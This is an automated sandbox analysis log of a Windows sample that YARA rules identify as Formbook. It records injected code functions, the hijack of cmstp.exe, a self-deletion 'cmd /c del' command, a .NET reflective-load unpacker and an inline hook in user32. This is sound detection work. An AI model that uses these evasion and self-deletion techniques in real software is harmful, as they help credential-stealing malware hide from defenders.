          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859E80 NtClose,10_2_00859E80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859E00 NtReadFile,10_2_00859E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00859F30 NtAllocateVirtualMemory,10_2_00859F30
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_009251A10_2_009251A1
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0093283A0_2_0093283A
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E1EB2_2_0041E1EB
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041D1F92_2_0041D1F9
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E2652_2_0041E265
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041D5CF2_2_0041D5CF
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E64E2_2_0041E64E
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041DFF72_2_0041DFF7
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_009451A12_2_009451A1
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0095283A2_2_0095283A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B09010_2_0491B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A010_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D20A810_2_049D20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491841F10_2_0491841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C100210_2_049C1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493258110_2_04932581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491D5E010_2_0491D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490F90010_2_0490F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D2D0710_2_049D2D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04900D2010_2_04900D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492412010_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D1D5510_2_049D1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D22AE10_2_049D22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D2EF710_2_049D2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04926E3010_2_04926E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493EBB010_2_0493EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CDBD210_2_049CDBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D1FF110_2_049D1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D2B2810_2_049D2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E1EB10_2_0085E1EB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E26510_2_0085E265
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00842D8710_2_00842D87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00842D9010_2_00842D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00849E3010_2_00849E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E64E10_2_0085E64E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00842FB010_2_00842FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085DFF710_2_0085DFF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0490B150 appears 35 times
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs 20210113432.exe
          Source: 20210113432.exe, 00000000.00000002.254070147.0000000000A28000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exe, 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000000.253368089.0000000000A48000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs 20210113432.exe
          Source: 20210113432.exeBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\20210113432.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20210113432.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
          Source: 20210113432.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Customer] SET [Address] = @Address, [Postal_Code] = @Postal_Code, [Country] = @Country, [C_ID] = @C_ID, [C_City] = @C_City, [C_Phone] = @C_Phone WHERE (((@IsNull_Address = 1 AND [Address] IS NULL) OR ([Address] = @Original_Address)) AND ((@IsNull_Postal_Code = 1 AND [Postal_Code] IS NULL) OR ([Postal_Code] = @Original_Postal_Code)) AND ((@IsNull_Country = 1 AND [Country] IS NULL) OR ([Country] = @Original_Country)) AND ([C_ID] = @Original_C_ID) AND ((@IsNull_C_City = 1 AND [C_City] IS NULL) OR ([C_City] = @Original_C_City)) AND ((@IsNull_C_Phone = 1 AND [C_Phone] IS NULL) OR ([C_Phone] = @Original_C_Phone)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Invoice] ([C_ID], [INV_ID], [M_ID], [Services_Cost], [Inv_Date], [Electr_Cost], [Water_Cost], [Total_Cost]) VALUES (@C_ID, @INV_ID, @M_ID, @Services_Cost, @Inv_Date, @Electr_Cost, @Water_Cost, @Total_Cost);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Payment_Method] ([M_ID], [Method]) VALUES (@M_ID, @Method);
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Room_Type] ([TYPE_ID], [Name], [Description]) VALUES (@TYPE_ID, @Name, @Description); SELECT TYPE_ID, Name, Des
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Payment_Method] ([M_ID], [Method]) VALUES (@M_ID, @Method); SELECT M_ID, Method FROM Payment_Method WHERE (M_ID
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Services] ([Price], [Name], [Description], [Serv_Date], [S_ID]) VALUES (@Price, @Name, @Description, @Serv_Date, @S_ID);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Customer] ([Address], [Postal_Code], [Country], [C_ID], [C_City], [C_Phone]) VALUES (@Address, @Postal_Code, @Country, @C_ID, @C_City, @C_Phone);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Invoice] SET [C_ID] = @C_ID, [INV_ID] = @INV_ID, [M_ID] = @M_ID, [Services_Cost] = @Services_Cost, [Inv_Date] = @Inv_Date, [Electr_Cost] = @Electr_Cost, [Water_Cost] = @Water_Cost, [Total_Cost] = @Total_Cost WHERE (((@IsNull_C_ID = 1 AND [C_ID] IS NULL) OR ([C_ID] = @Original_C_ID)) AND ([INV_ID] = @Original_INV_ID) AND ((@IsNull_M_ID = 1 AND [M_ID] IS NULL) OR ([M_ID] = @Original_M_ID)) AND ((@IsNull_Services_Cost = 1 AND [Services_Cost] IS NULL) OR ([Services_Cost] = @Original_Services_Cost)) AND ((@IsNull_Inv_Date = 1 AND [Inv_Date] IS NULL) OR ([Inv_Date] = @Original_Inv_Date)) AND ((@IsNull_Electr_Cost = 1 AND [Electr_Cost] IS NULL) OR ([Electr_Cost] = @Original_Electr_Cost)) AND ((@IsNull_Water_Cost = 1 AND [Water_Cost] IS NULL) OR ([Water_Cost] = @Original_Water_Cost)) AND ((@IsNull_Total_Cost = 1 AND [Total_Cost] IS NULL) OR ([Total_Cost] = @Original_Total_Cost)));
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Person] ([First_Name], [Last_Name], [SIN]) VALUES (@First_Name, @Last_Name, @SIN); SELECT First_Name, Last_Name
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Person] SET [First_Name] = @First_Name, [Last_Name] = @Last_Name, [SIN] = @SIN WHERE (((@IsNull_First_Name = 1 AND [First_Name] IS NULL) OR ([First_Name] = @Original_First_Name)) AND ((@IsNull_Last_Name = 1 AND [Last_Name] IS NULL) OR ([Last_Name] = @Original_Last_Name)) AND ([SIN] = @Original_SIN));
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Employee] ([E_ID], [Position]) VALUES (@E_ID, @Position); SELECT E_ID, Position FROM Employee WHERE (E_ID = @E_
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee] ([E_ID], [Position]) VALUES (@E_ID, @Position);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Payment_Method] SET [M_ID] = @M_ID, [Method] = @Method WHERE (([M_ID] = @Original_M_ID) AND ((@IsNull_Method = 1 AND [Method] IS NULL) OR ([Method] = @Original_Method)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Rooms] SET [R_ID] = @R_ID, [Price] = @Price, [Smoking_Allowed] = @Smoking_Allowed, [Description] = @Description, [Num_Of_Beds] = @Num_Of_Beds, [Floor] = @Floor WHERE (([R_ID] = @Original_R_ID) AND ((@IsNull_Price = 1 AND [Price] IS NULL) OR ([Price] = @Original_Price)) AND ((@IsNull_Smoking_Allowed = 1 AND [Smoking_Allowed] IS NULL) OR ([Smoking_Allowed] = @Original_Smoking_Allowed)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)) AND ((@IsNull_Num_Of_Beds = 1 AND [Num_Of_Beds] IS NULL) OR ([Num_Of_Beds] = @Original_Num_Of_Beds)) AND ((@IsNull_Floor = 1 AND [Floor] IS NULL) OR ([Floor] = @Original_Floor)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Room_Type] SET [TYPE_ID] = @TYPE_ID, [Name] = @Name, [Description] = @Description WHERE (([TYPE_ID] = @Original_TYPE_ID) AND ((@IsNull_Name = 1 AND [Name] IS NULL) OR ([Name] = @Original_Name)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Reservation] SET [C_ID] = @C_ID, [Date] = @Date, [RES_ID] = @RES_ID, [R_ID] = @R_ID, [Check_Out_Time] = @Check_Out_Time, [Check_In_Time] = @Check_In_Time WHERE (((@IsNull_C_ID = 1 AND [C_ID] IS NULL) OR ([C_ID] = @Original_C_ID)) AND ((@IsNull_Date = 1 AND [Date] IS NULL) OR ([Date] = @Original_Date)) AND ([RES_ID] = @Original_RES_ID) AND ((@IsNull_R_ID = 1 AND [R_ID] IS NULL) OR ([R_ID] = @Original_R_ID)) AND ((@IsNull_Check_Out_Time = 1 AND [Check_Out_Time] IS NULL) OR ([Check_Out_Time] = @Original_Check_Out_Time)) AND ((@IsNull_Check_In_Time = 1 AND [Check_In_Time] IS NULL) OR ([Check_In_Time] = @Original_Check_In_Time)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Employee] SET [E_ID] = @E_ID, [Position] = @Position WHERE (([E_ID] = @Original_E_ID) AND ((@IsNull_Position = 1 AND [Position] IS NULL) OR ([Position] = @Original_Position)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Services] SET [Price] = @Price, [Name] = @Name, [Description] = @Description, [Serv_Date] = @Serv_Date, [S_ID] = @S_ID WHERE (((@IsNull_Price = 1 AND [Price] IS NULL) OR ([Price] = @Original_Price)) AND ((@IsNull_Name = 1 AND [Name] IS NULL) OR ([Name] = @Original_Name)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)) AND ((@IsNull_Serv_Date = 1 AND [Serv_Date] IS NULL) OR ([Serv_Date] = @Original_Serv_Date)) AND ([S_ID] = @Original_S_ID));
          Source: 20210113432.exeVirustotal: Detection: 28%
          Source: 20210113432.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\20210113432.exe 'C:\Users\user\Desktop\20210113432.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\20210113432.exeProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 20210113432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 20210113432.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 20210113432.exeStatic file information: File size 1070592 > 1048576
          Source: 20210113432.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x104a00
          Source: 20210113432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 20210113432.exe, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.20210113432.exe.920000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.20210113432.exe.920000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.20210113432.exe.940000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.20210113432.exe.940000.1.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0092DD3E push 6F060001h; iretd 0_2_0092DD52
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0093862E push 00000000h; iretd 0_2_00938678
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0092FB28 push 73000004h; retf 0_2_0092FB55
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00417800 push ebp; retf 2_2_0041780B
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040D8D8 push edi; retf 2_2_0040D8DD
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409B78 push ecx; ret 2_2_00409B80
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040F3CD push FFFFFFB4h; ret 2_2_0040F3CF
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00417BEA push 00000042h; retf 2_2_00417BEC
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409B78 push ecx; ret 2_2_00409B80
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E47D push eax; ret 2_2_0041E5D4
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00405DE5 pushfd ; iretd 2_2_00405DEE
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CEF2 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CEFB push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CEA5 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CF5C push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041DFBD push 0000006Fh; ret 2_2_0041DFC1
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0094FB28 push 73000004h; retf 2_2_0094FB55
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0094DD3E push 6F060001h; iretd 2_2_0094DD52
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0095862E push 00000000h; iretd 2_2_00958678
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0495D0D1 push ecx; ret 10_2_0495D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0084D8D8 push edi; retf 10_2_0084D8DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00857800 push ebp; retf 10_2_0085780B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085D267 push ebx; ret 10_2_0085D275
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0084F3CD push FFFFFFB4h; ret 10_2_0084F3CF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00857BEA push 00000042h; retf 10_2_00857BEC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00849B78 push ecx; ret 10_2_00849B80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E47D push eax; ret 10_2_0085E5D4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00845DE5 pushfd ; iretd 10_2_00845DEE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085CEA5 push eax; ret 10_2_0085CEF8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085CEF2 push eax; ret 10_2_0085CEF8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085CEFB push eax; ret 10_2_0085CF62
          Source: initial sampleStatic PE information: section name: .text entropy: 7.02780570419

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE8
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
